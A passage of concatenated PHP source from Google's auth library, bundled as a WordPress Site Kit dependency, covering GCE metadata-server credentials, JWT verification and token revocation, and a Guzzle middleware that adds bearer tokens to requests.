AuthTokenMiddleware($gce); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); */ class GCECredentials extends \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader implements \Google\Site_Kit_Dependencies\Google\Auth\SignBlobInterface, \Google\Site_Kit_Dependencies\Google\Auth\ProjectIdProviderInterface, \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface { use IamSignerTrait; // phpcs:disable const cacheKey = 'GOOGLE_AUTH_PHP_GCE'; // phpcs:enable /** * The metadata IP address on appengine instances. * * The IP is used instead of the domain 'metadata' to avoid slow responses * when not on Compute Engine. */ const METADATA_IP = '169.254.169.254'; /** * The metadata path of the default token. */ const TOKEN_URI_PATH = 'v1/instance/service-accounts/default/token'; /** * The metadata path of the default id token. */ const ID_TOKEN_URI_PATH = 'v1/instance/service-accounts/default/identity'; /** * The metadata path of the client ID. */ const CLIENT_ID_URI_PATH = 'v1/instance/service-accounts/default/email'; /** * The metadata path of the project ID. */ const PROJECT_ID_URI_PATH = 'v1/project/project-id'; /** * The metadata path of the project ID. */ const UNIVERSE_DOMAIN_URI_PATH = 'v1/universe/universe_domain'; /** * The header whose presence indicates GCE presence. */ const FLAVOR_HEADER = 'Metadata-Flavor'; /** * The Linux file which contains the product name. */ private const GKE_PRODUCT_NAME_FILE = '/sys/class/dmi/id/product_name'; /** * Note: the explicit `timeout` and `tries` below is a workaround. The underlying * issue is that resolving an unknown host on some networks will take * 20-30 seconds; making this timeout short fixes the issue, but * could lead to false negatives in the event that we are on GCE, but * the metadata resolution was particularly slow. The latter case is * "unlikely" since the expected 4-nines time is about 0.5 seconds. * This allows us to limit the total ping maximum timeout to 1.5 seconds * for developer desktop scenarios. */ const MAX_COMPUTE_PING_TRIES = 3; const COMPUTE_PING_CONNECTION_TIMEOUT_S = 0.5; /** * Flag used to ensure that the onGCE test is only done once;. * * @var bool */ private $hasCheckedOnGce = \false; /** * Flag that stores the value of the onGCE check. * * @var bool */ private $isOnGce = \false; /** * Result of fetchAuthToken. * * @var array<mixed> */ protected $lastReceivedToken; /** * @var string|null */ private $clientName; /** * @var string|null */ private $projectId; /** * @var string */ private $tokenUri; /** * @var string */ private $targetAudience; /** * @var string|null */ private $quotaProject; /** * @var string|null */ private $serviceAccountIdentity; /** * @var string */ private ?string $universeDomain; /** * @param Iam $iam [optional] An IAM instance. * @param string|string[] $scope [optional] the scope of the access request, * expressed either as an array or as a space-delimited string. * @param string $targetAudience [optional] The audience for the ID token. * @param string $quotaProject [optional] Specifies a project to bill for access * charges associated with the request. * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @param string $universeDomain [optional] Specify a universe domain to use * instead of fetching one from the metadata server. */ public function __construct(?\Google\Site_Kit_Dependencies\Google\Auth\Iam $iam = null, $scope = null, $targetAudience = null, $quotaProject = null, $serviceAccountIdentity = null, ?string $universeDomain = null) { $this->iam = $iam; if ($scope && $targetAudience) { throw new \InvalidArgumentException('Scope and targetAudience cannot both be supplied'); } $tokenUri = self::getTokenUri($serviceAccountIdentity); if ($scope) { if (\is_string($scope)) { $scope = \explode(' ', $scope); } $scope = \implode(',', $scope); $tokenUri = $tokenUri . '?scopes=' . $scope; } elseif ($targetAudience) { $tokenUri = self::getIdTokenUri($serviceAccountIdentity); $tokenUri = $tokenUri . '?audience=' . $targetAudience; $this->targetAudience = $targetAudience; } $this->tokenUri = $tokenUri; $this->quotaProject = $quotaProject; $this->serviceAccountIdentity = $serviceAccountIdentity; $this->universeDomain = $universeDomain; } /** * The full uri for accessing the default token. * * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @return string */ public static function getTokenUri($serviceAccountIdentity = null) { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; $base .= self::TOKEN_URI_PATH; if ($serviceAccountIdentity) { return \str_replace('/default/', '/' . $serviceAccountIdentity . '/', $base); } return $base; } /** * The full uri for accessing the default service account. * * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @return string */ public static function getClientNameUri($serviceAccountIdentity = null) { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; $base .= self::CLIENT_ID_URI_PATH; if ($serviceAccountIdentity) { return \str_replace('/default/', '/' . $serviceAccountIdentity . '/', $base); } return $base; } /** * The full uri for accesesing the default identity token. * * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @return string */ private static function getIdTokenUri($serviceAccountIdentity = null) { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; $base .= self::ID_TOKEN_URI_PATH; if ($serviceAccountIdentity) { return \str_replace('/default/', '/' . $serviceAccountIdentity . '/', $base); } return $base; } /** * The full uri for accessing the default project ID. * * @return string */ private static function getProjectIdUri() { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; return $base . self::PROJECT_ID_URI_PATH; } /** * The full uri for accessing the default universe domain. * * @return string */ private static function getUniverseDomainUri() { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; return $base . self::UNIVERSE_DOMAIN_URI_PATH; } /** * Determines if this an App Engine Flexible instance, by accessing the * GAE_INSTANCE environment variable. * * @return bool true if this an App Engine Flexible Instance, false otherwise */ public static function onAppEngineFlexible() { return \substr((string) \getenv('GAE_INSTANCE'), 0, 4) === 'aef-'; } /** * Determines if this a GCE instance, by accessing the expected metadata * host. * If $httpHandler is not specified a the default HttpHandler is used. * * @param callable $httpHandler callback which delivers psr7 request * @return bool True if this a GCEInstance, false otherwise */ public static function onGce(?callable $httpHandler = null) { $httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); $checkUri = 'http://' . self::METADATA_IP; for ($i = 1; $i <= self::MAX_COMPUTE_PING_TRIES; $i++) { try { // Comment from: oauth2client/client.py // // Note: the explicit `timeout` below is a workaround. The underlying // issue is that resolving an unknown host on some networks will take // 20-30 seconds; making this timeout short fixes the issue, but // could lead to false negatives in the event that we are on GCE, but // the metadata resolution was particularly slow. The latter case is // "unlikely". $resp = $httpHandler(new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $checkUri, [self::FLAVOR_HEADER => 'Google']), ['timeout' => self::COMPUTE_PING_CONNECTION_TIMEOUT_S]); return $resp->getHeaderLine(self::FLAVOR_HEADER) == 'Google'; } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ClientException $e) { } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ServerException $e) { } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException $e) { } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ConnectException $e) { } } if (\PHP_OS === 'Windows') { // @TODO: implement GCE residency detection on Windows return \false; } // Detect GCE residency on Linux return self::detectResidencyLinux(self::GKE_PRODUCT_NAME_FILE); } private static function detectResidencyLinux(string $productNameFile) : bool { if (\file_exists($productNameFile)) { $productName = \trim((string) \file_get_contents($productNameFile)); return 0 === \strpos($productName, 'Google'); } return \false; } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * Fetches the auth tokens from the GCE metadata host if it is available. * If $httpHandler is not specified a the default HttpHandler is used. * * @param callable $httpHandler callback which delivers psr7 request * * @return array<mixed> { * A set of auth related metadata, based on the token type. * * @type string $access_token for access tokens * @type int $expires_in for access tokens * @type string $token_type for access tokens * @type string $id_token for ID tokens * } * @throws \Exception */ public function fetchAuthToken(?callable $httpHandler = null) { $httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = \true; } if (!$this->isOnGce) { return []; // return an empty array with no access token } $response = $this->getFromMetadata($httpHandler, $this->tokenUri); if ($this->targetAudience) { return $this->lastReceivedToken = ['id_token' => $response]; } if (null === ($json = \json_decode($response, \true))) { throw new \Exception('Invalid JSON response'); } $json['expires_at'] = \time() + $json['expires_in']; // store this so we can retrieve it later $this->lastReceivedToken = $json; return $json; } /** * @return string */ public function getCacheKey() { return self::cacheKey; } /** * @return array<mixed>|null */ public function getLastReceivedToken() { if ($this->lastReceivedToken) { if (\array_key_exists('id_token', $this->lastReceivedToken)) { return $this->lastReceivedToken; } return ['access_token' => $this->lastReceivedToken['access_token'], 'expires_at' => $this->lastReceivedToken['expires_at']]; } return null; } /** * Get the client name from GCE metadata. * * Subsequent calls will return a cached value. * * @param callable $httpHandler callback which delivers psr7 request * @return string */ public function getClientName(?callable $httpHandler = null) { if ($this->clientName) { return $this->clientName; } $httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = \true; } if (!$this->isOnGce) { return ''; } $this->clientName = $this->getFromMetadata($httpHandler, self::getClientNameUri($this->serviceAccountIdentity)); return $this->clientName; } /** * Fetch the default Project ID from compute engine. * * Returns null if called outside GCE. * * @param callable $httpHandler Callback which delivers psr7 request * @return string|null */ public function getProjectId(?callable $httpHandler = null) { if ($this->projectId) { return $this->projectId; } $httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = \true; } if (!$this->isOnGce) { return null; } $this->projectId = $this->getFromMetadata($httpHandler, self::getProjectIdUri()); return $this->projectId; } /** * Fetch the default universe domain from the metadata server. * * @param callable $httpHandler Callback which delivers psr7 request * @return string */ public function getUniverseDomain(?callable $httpHandler = null) : string { if (null !== $this->universeDomain) { return $this->universeDomain; } $httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = \true; } try { $this->universeDomain = $this->getFromMetadata($httpHandler, self::getUniverseDomainUri()); } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ClientException $e) { // If the metadata server exists, but returns a 404 for the universe domain, the auth // libraries should safely assume this is an older metadata server running in GCU, and // should return the default universe domain. if (!$e->hasResponse() || 404 != $e->getResponse()->getStatusCode()) { throw $e; } $this->universeDomain = self::DEFAULT_UNIVERSE_DOMAIN; } // We expect in some cases the metadata server will return an empty string for the universe // domain. In this case, the auth library MUST return the default universe domain. if ('' === $this->universeDomain) { $this->universeDomain = self::DEFAULT_UNIVERSE_DOMAIN; } return $this->universeDomain; } /** * Fetch the value of a GCE metadata server URI. * * @param callable $httpHandler An HTTP Handler to deliver PSR7 requests. * @param string $uri The metadata URI. * @return string */ private function getFromMetadata(callable $httpHandler, $uri) { $resp = $httpHandler(new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $uri, [self::FLAVOR_HEADER => 'Google'])); return (string) $resp->getBody(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Set whether or not we've already checked the GCE environment. * * @param bool $isOnGce * * @return void */ public function setIsOnGce($isOnGce) { // Implicitly set hasCheckedGce to true $this->hasCheckedOnGce = \true; // Set isOnGce $this->isOnGce = $isOnGce; } } <?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use DateTime; use Google\Site_Kit_Dependencies\Firebase\JWT\ExpiredException; use Google\Site_Kit_Dependencies\Firebase\JWT\JWT; use Google\Site_Kit_Dependencies\Firebase\JWT\Key; use Google\Site_Kit_Dependencies\Firebase\JWT\SignatureInvalidException; use Google\Site_Kit_Dependencies\Google\Auth\Cache\MemoryCacheItemPool; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils; use InvalidArgumentException; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; use RuntimeException; use Google\Site_Kit_Dependencies\SimpleJWT\InvalidTokenException; use Google\Site_Kit_Dependencies\SimpleJWT\JWT as SimpleJWT; use Google\Site_Kit_Dependencies\SimpleJWT\Keys\KeyFactory; use Google\Site_Kit_Dependencies\SimpleJWT\Keys\KeySet; use TypeError; use UnexpectedValueException; /** * Wrapper around Google Access Tokens which provides convenience functions. * * @experimental */ class AccessToken { const FEDERATED_SIGNON_CERT_URL = 'https://www.googleapis.com/oauth2/v3/certs'; const IAP_CERT_URL = 'https://www.gstatic.com/iap/verify/public_key-jwk'; const IAP_ISSUER = 'https://cloud.google.com/iap'; const OAUTH2_ISSUER = 'accounts.google.com'; const OAUTH2_ISSUER_HTTPS = 'https://accounts.google.com'; const OAUTH2_REVOKE_URI = 'https://oauth2.googleapis.com/revoke'; /** * @var callable */ private $httpHandler; /** * @var CacheItemPoolInterface */ private $cache; /** * @param callable $httpHandler [optional] An HTTP Handler to deliver PSR-7 requests. * @param CacheItemPoolInterface $cache [optional] A PSR-6 compatible cache implementation. */ public function __construct(?callable $httpHandler = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $this->httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); $this->cache = $cache ?: new \Google\Site_Kit_Dependencies\Google\Auth\Cache\MemoryCacheItemPool(); } /** * Verifies an id token and returns the authenticated apiLoginTicket. * Throws an exception if the id token is not valid. * The audience parameter can be used to control which id tokens are * accepted. By default, the id token must have been issued to this OAuth2 client. * * @param string $token The JSON Web Token to be verified. * @param array<mixed> $options [optional] { * Configuration options. * @type string $audience The indended recipient of the token. * @type string $issuer The intended issuer of the token. * @type string $cacheKey The cache key of the cached certs. Defaults to * the sha1 of $certsLocation if provided, otherwise is set to * "federated_signon_certs_v3". * @type string $certsLocation The location (remote or local) from which * to retrieve certificates, if not cached. This value should only be * provided in limited circumstances in which you are sure of the * behavior. * @type bool $throwException Whether the function should throw an * exception if the verification fails. This is useful for * determining the reason verification failed. * } * @return array<mixed>|false the token payload, if successful, or false if not. * @throws InvalidArgumentException If certs could not be retrieved from a local file. * @throws InvalidArgumentException If received certs are in an invalid format. * @throws InvalidArgumentException If the cert alg is not supported. * @throws RuntimeException If certs could not be retrieved from a remote location. * @throws UnexpectedValueException If the token issuer does not match. * @throws UnexpectedValueException If the token audience does not match. */ public function verify($token, array $options = []) { $audience = $options['audience'] ?? null; $issuer = $options['issuer'] ?? null; $certsLocation = $options['certsLocation'] ?? self::FEDERATED_SIGNON_CERT_URL; $cacheKey = $options['cacheKey'] ?? $this->getCacheKeyFromCertLocation($certsLocation); $throwException = $options['throwException'] ?? \false; // for backwards compatibility // Check signature against each available cert. $certs = $this->getCerts($certsLocation, $cacheKey, $options); $alg = $this->determineAlg($certs); if (!\in_array($alg, ['RS256', 'ES256'])) { throw new \InvalidArgumentException('unrecognized "alg" in certs, expected ES256 or RS256'); } try { if ($alg == 'RS256') { return $this->verifyRs256($token, $certs, $audience, $issuer); } return $this->verifyEs256($token, $certs, $audience, $issuer); } catch (\Google\Site_Kit_Dependencies\Firebase\JWT\ExpiredException $e) { // firebase/php-jwt 5+ } catch (\Google\Site_Kit_Dependencies\Firebase\JWT\SignatureInvalidException $e) { // firebase/php-jwt 5+ } catch (\Google\Site_Kit_Dependencies\SimpleJWT\InvalidTokenException $e) { // simplejwt } catch (\InvalidArgumentException $e) { } catch (\UnexpectedValueException $e) { } if ($throwException) { throw $e; } return \false; } /** * Identifies the expected algorithm to verify by looking at the "alg" key * of the provided certs. * * @param array<mixed> $certs Certificate array according to the JWK spec (see * https://tools.ietf.org/html/rfc7517). * @return string The expected algorithm, such as "ES256" or "RS256". */ private function determineAlg(array $certs) { $alg = null; foreach ($certs as $cert) { if (empty($cert['alg'])) { throw new \InvalidArgumentException('certs expects "alg" to be set'); } $alg = $alg ?: $cert['alg']; if ($alg != $cert['alg']) { throw new \InvalidArgumentException('More than one alg detected in certs'); } } return $alg; } /** * Verifies an ES256-signed JWT. * * @param string $token The JSON Web Token to be verified. * @param array<mixed> $certs Certificate array according to the JWK spec (see * https://tools.ietf.org/html/rfc7517). * @param string|null $audience If set, returns false if the provided * audience does not match the "aud" claim on the JWT. * @param string|null $issuer If set, returns false if the provided * issuer does not match the "iss" claim on the JWT. * @return array<mixed> the token payload, if successful, or false if not. */ private function verifyEs256($token, array $certs, $audience = null, $issuer = null) { $this->checkSimpleJwt(); $jwkset = new \Google\Site_Kit_Dependencies\SimpleJWT\Keys\KeySet(); foreach ($certs as $cert) { $jwkset->add(\Google\Site_Kit_Dependencies\SimpleJWT\Keys\KeyFactory::create($cert, 'php')); } // Validate the signature using the key set and ES256 algorithm. $jwt = $this->callSimpleJwtDecode([$token, $jwkset, 'ES256']); $payload = $jwt->getClaims(); if ($audience) { if (!isset($payload['aud']) || $payload['aud'] != $audience) { throw new \UnexpectedValueException('Audience does not match'); } } // @see https://cloud.google.com/iap/docs/signed-headers-howto#verifying_the_jwt_payload $issuer = $issuer ?: self::IAP_ISSUER; if (!isset($payload['iss']) || $payload['iss'] !== $issuer) { throw new \UnexpectedValueException('Issuer does not match'); } return $payload; } /** * Verifies an RS256-signed JWT. * * @param string $token The JSON Web Token to be verified. * @param array<mixed> $certs Certificate array according to the JWK spec (see * https://tools.ietf.org/html/rfc7517). * @param string|null $audience If set, returns false if the provided * audience does not match the "aud" claim on the JWT. * @param string|null $issuer If set, returns false if the provided * issuer does not match the "iss" claim on the JWT. * @return array<mixed> the token payload, if successful, or false if not. */ private function verifyRs256($token, array $certs, $audience = null, $issuer = null) { $this->checkAndInitializePhpsec(); $keys = []; foreach ($certs as $cert) { if (empty($cert['kid'])) { throw new \InvalidArgumentException('certs expects "kid" to be set'); } if (empty($cert['n']) || empty($cert['e'])) { throw new \InvalidArgumentException('RSA certs expects "n" and "e" to be set'); } $publicKey = $this->loadPhpsecPublicKey($cert['n'], $cert['e']); // create an array of key IDs to certs for the JWT library $keys[$cert['kid']] = new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($publicKey, 'RS256'); } $payload = $this->callJwtStatic('decode', [$token, $keys]); if ($audience) { if (!\property_exists($payload, 'aud') || $payload->aud != $audience) { throw new \UnexpectedValueException('Audience does not match'); } } // support HTTP and HTTPS issuers // @see https://developers.google.com/identity/sign-in/web/backend-auth $issuers = $issuer ? [$issuer] : [self::OAUTH2_ISSUER, self::OAUTH2_ISSUER_HTTPS]; if (!isset($payload->iss) || !\in_array($payload->iss, $issuers)) { throw new \UnexpectedValueException('Issuer does not match'); } return (array) $payload; } /** * Revoke an OAuth2 access token or refresh token. This method will revoke the current access * token, if a token isn't provided. * * @param string|array<mixed> $token The token (access token or a refresh token) that should be revoked. * @param array<mixed> $options [optional] Configuration options. * @return bool Returns True if the revocation was successful, otherwise False. */ public function revoke($token, array $options = []) { if (\is_array($token)) { if (isset($token['refresh_token'])) { $token = $token['refresh_token']; } else { $token = $token['access_token']; } } $body = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor(\http_build_query(['token' => $token])); $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('POST', self::OAUTH2_REVOKE_URI, ['Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded'], $body); $httpHandler = $this->httpHandler; $response = $httpHandler($request, $options); return $response->getStatusCode() == 200; } /** * Gets federated sign-on certificates to use for verifying identity tokens. * Returns certs as array structure, where keys are key ids, and values * are PEM encoded certificates. * * @param string $location The location from which to retrieve certs. * @param string $cacheKey The key under which to cache the retrieved certs. * @param array<mixed> $options [optional] Configuration options. * @return array<mixed> * @throws InvalidArgumentException If received certs are in an invalid format. */ private function getCerts($location, $cacheKey, array $options = []) { $cacheItem = $this->cache->getItem($cacheKey); $certs = $cacheItem ? $cacheItem->get() : null; $expireTime = null; if (!$certs) { list($certs, $expireTime) = $this->retrieveCertsFromLocation($location, $options); } if (!isset($certs['keys'])) { if ($location !== self::IAP_CERT_URL) { throw new \InvalidArgumentException('federated sign-on certs expects "keys" to be set'); } throw new \InvalidArgumentException('certs expects "keys" to be set'); } // Push caching off until after verifying certs are in a valid format. // Don't want to cache bad data. if ($expireTime) { $cacheItem->expiresAt(new \DateTime($expireTime)); $cacheItem->set($certs); $this->cache->save($cacheItem); } return $certs['keys']; } /** * Retrieve and cache a certificates file. * * @param string $url location * @param array<mixed> $options [optional] Configuration options. * @return array{array<mixed>, string} * @throws InvalidArgumentException If certs could not be retrieved from a local file. * @throws RuntimeException If certs could not be retrieved from a remote location. */ private function retrieveCertsFromLocation($url, array $options = []) { // If we're retrieving a local file, just grab it. $expireTime = '+1 hour'; if (\strpos($url, 'http') !== 0) { if (!\file_exists($url)) { throw new \InvalidArgumentException(\sprintf('Failed to retrieve verification certificates from path: %s.', $url)); } return [\json_decode((string) \file_get_contents($url), \true), $expireTime]; } $httpHandler = $this->httpHandler; $response = $httpHandler(new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $url), $options); if ($response->getStatusCode() == 200) { if ($cacheControl = $response->getHeaderLine('Cache-Control')) { \array_map(function ($value) use(&$expireTime) { list($key, $value) = \explode('=', $value) + [null, null]; if (\trim($key) == 'max-age') { $expireTime = '+' . $value . ' seconds'; } }, \explode(',', $cacheControl)); } return [\json_decode((string) $response->getBody(), \true), $expireTime]; } throw new \RuntimeException(\sprintf('Failed to retrieve verification certificates: "%s".', $response->getBody()->getContents()), $response->getStatusCode()); } /** * @return void */ private function checkAndInitializePhpsec() { if (!\class_exists(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::class)) { throw new \RuntimeException('Please require phpseclib/phpseclib v3 to use this utility.'); } } /** * @return string * @throws TypeError If the key cannot be initialized to a string. */ private function loadPhpsecPublicKey(string $modulus, string $exponent) : string { $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader::load(['n' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($this->callJwtStatic('urlsafeB64Decode', [$modulus]), 256), 'e' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($this->callJwtStatic('urlsafeB64Decode', [$exponent]), 256)]); $formattedPublicKey = $key->toString('PKCS8'); if (!\is_string($formattedPublicKey)) { throw new \TypeError('Failed to initialize the key'); } return $formattedPublicKey; } /** * @return void */ private function checkSimpleJwt() { // @codeCoverageIgnoreStart if (!\class_exists(\Google\Site_Kit_Dependencies\SimpleJWT\JWT::class)) { throw new \RuntimeException('Please require kelvinmo/simplejwt ^0.2 to use this utility.'); } // @codeCoverageIgnoreEnd } /** * Provide a hook to mock calls to the JWT static methods. * * @param string $method * @param array<mixed> $args * @return mixed */ protected function callJwtStatic($method, array $args = []) { return \call_user_func_array([\Google\Site_Kit_Dependencies\Firebase\JWT\JWT::class, $method], $args); // @phpstan-ignore-line } /** * Provide a hook to mock calls to the JWT static methods. * * @param array<mixed> $args * @return mixed */ protected function callSimpleJwtDecode(array $args = []) { return \call_user_func_array([\Google\Site_Kit_Dependencies\SimpleJWT\JWT::class, 'decode'], $args); } /** * Generate a cache key based on the cert location using sha1 with the * exception of using "federated_signon_certs_v3" to preserve BC. * * @param string $certsLocation * @return string */ private function getCacheKeyFromCertLocation($certsLocation) { $key = $certsLocation === self::FEDERATED_SIGNON_CERT_URL ? 'federated_signon_certs_v3' : \sha1($certsLocation); return 'google_auth_certs_cache|' . $key; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Middleware; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * AuthTokenMiddleware is a Guzzle Middleware that adds an Authorization header * provided by an object implementing FetchAuthTokenInterface. * * The FetchAuthTokenInterface#fetchAuthToken is used to obtain a hash; one of * the values value in that hash is added as the authorization header. * * Requests will be accessed with the authorization header: * * 'authorization' 'Bearer <value of auth_token>' */ class AuthTokenMiddleware { /** * @var callable */ private $httpHandler; /** * It must be an implementation of FetchAuthTokenInterface. * It may also implement UpdateMetadataInterface allowing direct * retrieval of auth related headers * @var FetchAuthTokenInterface */ private $fetcher; /** * @var ?callable */ private $tokenCallback; /** * Creates a new AuthTokenMiddleware. * * @param FetchAuthTokenInterface $fetcher is used to fetch the auth token * @param callable $httpHandler (optional) callback which delivers psr7 request * @param callable $tokenCallback (optional) function to be called when a new token is fetched. */ public function __construct(\Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface $fetcher, ?callable $httpHandler = null, ?callable $tokenCallback = null) { $this->fetcher = $fetcher; $this->httpHandler = $httpHandler; $this->tokenCallback = $tokenCallback; } /** * Updates the request with an Authorization header when auth is 'google_auth'. * * use Google\Auth\Middleware\AuthTokenMiddleware; * use Google\Auth\OAuth2; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $config = [..<oauth config param>.]; * $oauth2 = new OAuth2($config) * $middleware = new AuthTokenMiddleware($oauth2); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler) { // Requests using "auth"="google_auth" will be authorized. if (!isset($options['auth']) || $options['auth'] !== 'google_auth') { return $handler($request, $options); } $request = $this->addAuthHeaders($request); if ($quotaProject = $this->getQuotaProject()) { $request = $request->withHeader(\Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface::X_GOOG_USER_PROJECT_HEADER, $quotaProject); } return $handler($request, $options); }; } /** * Adds auth related headers to the request. * * @param RequestInterface $request * @return RequestInterface */ private function addAuthHeaders(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) { if (!$this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface || $this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache && !$this->fetcher->getFetcher() instanceof \Google\Site_Kit_Dependencies\Google\Auth\UpdateMetadataInterface) { $token = $this->fetcher->fetchAuthToken(); $request = $request->withHeader('authorization', 'Bearer ' . ($token['access_token'] ?? $token['id_token'] ?? '')); } else { $headers = $this->fetcher->updateMetadata($request->getHeaders(), null, $this->httpHandler); $request = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::modifyRequest($request, ['set_headers' => $headers]); } if ($this->tokenCallback && ($token = $this->fetcher->getLastReceivedToken())) { if (\array_key_exists('access_token', $token)) { \call_user_func($this->tokenCallback, $this->fetcher->getCacheKey(), $token['access_token']); } } return $request; } /** * @return string|null */ private function getQuotaProject() { if ($this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface) { return $this->fetcher->getQuotaProject(); } return null; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Middleware; use 